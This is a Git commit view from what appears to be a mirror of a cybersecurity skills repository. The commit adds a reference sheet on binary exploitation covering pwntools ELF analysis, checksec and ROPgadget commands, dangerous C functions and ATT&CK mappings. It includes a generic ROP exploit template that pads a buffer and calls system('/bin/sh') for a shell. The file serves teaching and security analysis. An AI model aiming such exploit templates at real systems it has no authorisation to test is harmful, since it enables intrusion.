creator/Anthropic-Cybersecurity-Skills
1
0
Fork 0
mirror of https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git synced 2026-06-11 13:44:56 +03:00
Code Issues Packages Projects Releases Wiki Activity

Add 5 new cybersecurity skills batch 2 - oauth token theft, binary exploitation, STIX2 sharing, linux audit logs, timestomping detection

Browse Source
This commit is contained in:
mukul975
2026-03-11 00:48:08 +01:00
parent 5a5dcd84ac
commit ccce7d4e06
20 changed files with 1574 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
skills/performing-binary-exploitation-analysis/references/api-reference.md
+74
View File
@@ -0,0 +1,74 @@
# API Reference: Binary Exploitation Analysis
## pwntools (Python)
```bash
pip install pwntools
```
### ELF Analysis
```python
from pwn import ELF, ROP, context
elf = ELF('./vulnerable_binary')
print(elf.checksec()) # Security mitigations
print(hex(elf.sym['main'])) # Symbol address
print(hex(elf.plt['system'])) # PLT entry
print(hex(elf.got['puts'])) # GOT entry
# ROP gadget discovery
rop = ROP(elf)
pop_rdi = rop.find_gadget(['pop rdi', 'ret'])[0]
ret = rop.find_gadget(['ret'])[0]
```
### Exploit Template
```python
from pwn import *
context.binary = elf = ELF('./vuln')
p = process('./vuln') # or remote('host', port)
payload = flat(b'A' * offset, pop_rdi, next(elf.search(b'/bin/sh')), elf.plt['system'])
p.sendline(payload)
p.interactive()
```
## checksec CLI
```bash
checksec --file ./binary
checksec --file ./binary --output json
```
### Output Fields
| Field | Values | Impact |
|-------|--------|--------|
| NX | Enabled/Disabled | No shellcode on stack |
| PIE | Enabled/Disabled | Randomized addresses |
| Canary | Found/Not found | Stack smash detection |
| RELRO | Full/Partial/None | GOT write protection |
## ROPgadget CLI
```bash
# Find all gadgets
ROPgadget --binary ./vuln
# Search specific gadget
ROPgadget --binary ./vuln --only "pop|ret"
# Generate ROP chain
ROPgadget --binary ./vuln --ropchain
```
## Dangerous Functions
| Function | Risk |
|----------|------|
| gets() | Unbounded stdin read |
| strcpy() | No length check |
| sprintf() | No length check |
| scanf() | Possible overflow |
## MITRE ATT&CK
| Technique | Description |
|-----------|------------|
| T1203 | Exploitation for Client Execution |
| T1068 | Exploitation for Privilege Escalation |
| T1211 | Exploitation for Defense Evasion |